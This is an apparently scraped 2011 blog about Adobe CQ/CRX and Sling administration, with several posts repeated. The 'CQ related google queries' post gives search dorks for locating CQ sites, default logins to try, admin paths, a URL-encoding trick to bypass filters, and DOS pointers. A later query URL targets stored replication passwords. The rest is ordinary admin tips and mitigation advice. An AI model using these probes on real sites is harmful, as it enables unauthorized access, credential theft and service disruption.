so, you want to use vlt
read -p "password: " -s p
vlt -q rcp -q -b 1000 -t 1 - u "http://user:$p@foo/crx/-/jcr:root/content" "http://user:$p@bar/crx/-/jcr:root/content"
and it prints stuff like
Connecting via JCR remoting to http://user:r34lp455w0rd!!@localhost:4502/crx/server
I could not find a way to disable that. so,
vlt -q rcp -q -b 1000 -t 1 - u "http://user:$p@foo/crx/-/jcr:root/content" "http://user:$p@bar/crx/-/jcr:root/content" |grep -v "http://" >> your.log
Saturday, September 24, 2011
Saturday, September 17, 2011
CQ related google queries
This query returns many CQ sites:
http://www.google.com/search?q=inurl:/content/geometrixx
Many of the sites accept .json rendering (-1.json, 34324232.json ...etc). Some also accept .query.json?statement=//*
Easy for content grabbing and DOS attack.
Also, this:
http://www.google.com/search?q=inurl:/content/dam
Usually, /content/dam.xml is large. Easy for DOS attack.
And,
http://www.google.com/search?q=%22/etc/designs/*.css%22
Many sites block .json on /content. But they still let .json on /etc.
This queries shows a few author instances (try default cq logins other than admin:admin such as author:author):
http://www.google.com/search?q=%22cq5%20login%22
http://www.google.com/search?q=inurl:%22/etc/replication%22
Once you locate a CQ site, you can try various paths:
/system/console
/admin
/etc/replication
/crx
/crxde
/bin/crxde/logs
/libs/cq/core/content/login.html
/libs/crxde/resources/welcome.html
Also, try json servlets:
http://www.adobe.com/etc/pagetables/feed_proxies.tidy.-2345.json?asdf
format is:
/some/resource.<depth>.json
If things are blocked, try with some of characters replaced with url encoding.
For example, this is 404:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//element%28*,cq:Page%29
But this returns:
https://author.day.com/libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page)
e in query is replaced with %65 and o in json is replaced with %6F
Most of these are possible because of Sling: http://sling.apache.org/
Usually, databases use different port (and different protocol other than HTTP) to communicate with HTTP applications. Even databases that use HTTP (such as couchdb http://couchdb.apache.org/) can be configured to use different port from HTML rendering server. But Sling exposes entire database (JCR) content on the same port for HTTP clients to access.
Sling does have access control mechanism. But, common development paradigm for Sling is to expose all resources to everyone.
You could expose few resources and have resourceType to query/access actual content resource.
For example, instead of exposing the following:
/content/a.html
/content/b.html
/content/c.html
....
You can expose only one resource:
/content/pages
And, have resourceType of /content/pages handle GET requests to:
/content/pages.a.html
/content/pages.b.html
/content/pages.c.html
...
by reading actual content from:
/hidden/a
/hidden/b
/hidden/c
...
Or, you can have a proxy server blocking various paths that could be used maliciously. For example, CQ has dispatcher module for Apache httpd. You can configure dispatcher.any to deny access to various globs.
http://www.google.com/search?q=inurl:/content/geometrixx
Many of the sites accept .json rendering (-1.json, 34324232.json ...etc). Some also accept .query.json?statement=//*
Easy for content grabbing and DOS attack.
Also, this:
http://www.google.com/search?q=inurl:/content/dam
Usually, /content/dam.xml is large. Easy for DOS attack.
And,
http://www.google.com/search?q=%22/etc/designs/*.css%22
Many sites block .json on /content. But they still let .json on /etc.
This queries shows a few author instances (try default cq logins other than admin:admin such as author:author):
http://www.google.com/search?q=%22cq5%20login%22
http://www.google.com/search?q=inurl:%22/etc/replication%22
Once you locate a CQ site, you can try various paths:
/system/console
/admin
/etc/replication
/crx
/crxde
/bin/crxde/logs
/libs/cq/core/content/login.html
/libs/crxde/resources/welcome.html
Also, try json servlets:
http://www.adobe.com/etc/pagetables/feed_proxies.tidy.-2345.json?asdf
format is:
/some/resource.<depth>.json
If things are blocked, try with some of characters replaced with url encoding.
For example, this is 404:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//element%28*,cq:Page%29
But this returns:
https://author.day.com/libs/cq/core/content/login.qu%65ry.js%6Fn?statement=//element(*,cq:Page)
e in query is replaced with %65 and o in json is replaced with %6F
Most of these are possible because of Sling: http://sling.apache.org/
Usually, databases use different port (and different protocol other than HTTP) to communicate with HTTP applications. Even databases that use HTTP (such as couchdb http://couchdb.apache.org/) can be configured to use different port from HTML rendering server. But Sling exposes entire database (JCR) content on the same port for HTTP clients to access.
Sling does have access control mechanism. But, common development paradigm for Sling is to expose all resources to everyone.
You could expose few resources and have resourceType to query/access actual content resource.
For example, instead of exposing the following:
/content/a.html
/content/b.html
/content/c.html
....
You can expose only one resource:
/content/pages
And, have resourceType of /content/pages handle GET requests to:
/content/pages.a.html
/content/pages.b.html
/content/pages.c.html
...
by reading actual content from:
/hidden/a
/hidden/b
/hidden/c
...
Or, you can have a proxy server blocking various paths that could be used maliciously. For example, CQ has dispatcher module for Apache httpd. You can configure dispatcher.any to deny access to various globs.
Thursday, September 15, 2011
ADEP WEM with AWS EC2
Apparently, Adobe ADEP WEM product will be Amazon EC2 optimized.
http://adobecemcloud.com/download/
And, free CQ license:
http://adobecemcloud.com/download/licence.properties
http://adobecemcloud.com/download/
And, free CQ license:
http://adobecemcloud.com/download/licence.properties
flexibility of Sling
Sling lets you query contents:
https://author.day.com/libs/cq/core/content/login.query.json?statement=//*[@transportPassword]/%28@transportPassword%20|%20@transportUri%20|%20@transportUser%29
Wednesday, September 14, 2011
datastore garbage collection
My instance had 12GB datastore
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 196K 5.9G 1% /dev/shm
none 5.9G 104K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 12G 81G 13% /mnt/datastore
I ran datastore garbage collection, which ran for 5 hours. and it's now 2GB:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 296K 5.9G 1% /dev/shm
none 5.9G 108K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 2.0G 91G 3% /mnt/datastore
I have datastore out of crx-quickstart on a different drive for easy back up.. etc.
<DataStore class="com.day.crx.core.data.ClusterDataStore">
<param name="path" value="/mnt/datastore"/>
</DataStore>
The script for running datastore garbage collection is here:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 196K 5.9G 1% /dev/shm
none 5.9G 104K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 12G 81G 13% /mnt/datastore
I ran datastore garbage collection, which ran for 5 hours. and it's now 2GB:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 169G 73G 88G 46% /
none 5.9G 672K 5.9G 1% /dev
none 5.9G 296K 5.9G 1% /dev/shm
none 5.9G 108K 5.9G 1% /var/run
none 5.9G 0 5.9G 0% /var/lock
/dev/sda2 98G 2.0G 91G 3% /mnt/datastore
I have datastore out of crx-quickstart on a different drive for easy back up.. etc.
<DataStore class="com.day.crx.core.data.ClusterDataStore">
<param name="path" value="/mnt/datastore"/>
</DataStore>
The script for running datastore garbage collection is here:
/crx/login.jsp
there are curl command examples:
http://dev.day.com/docs/en/crx/current/administering/backup_and_restore.html#Automating%20Backup%20Creation?
For example,
Of course they don't work.
You need this instead:
curl -c login.txt -F"_charset_=UTF-8" -F"UserId=admin" -F"Password=admin" -F"Workspace=crx.default" "http://localhost:7402/crx/login.jsp"
You need POST request.. and also include _charset_ param.
http://dev.day.com/docs/en/crx/current/administering/backup_and_restore.html#Automating%20Backup%20Creation?
For example,
curl -c login.txt "http://localhost:7402/crx/login.jsp?UserId=admin&Password=xyz&Workspace=crx.default"
Of course they don't work.
You need this instead:
curl -c login.txt -F"_charset_=UTF-8" -F"UserId=admin" -F"Password=admin" -F"Workspace=crx.default" "http://localhost:7402/crx/login.jsp"
You need POST request.. and also include _charset_ param.
Subscribe to:
Posts (Atom)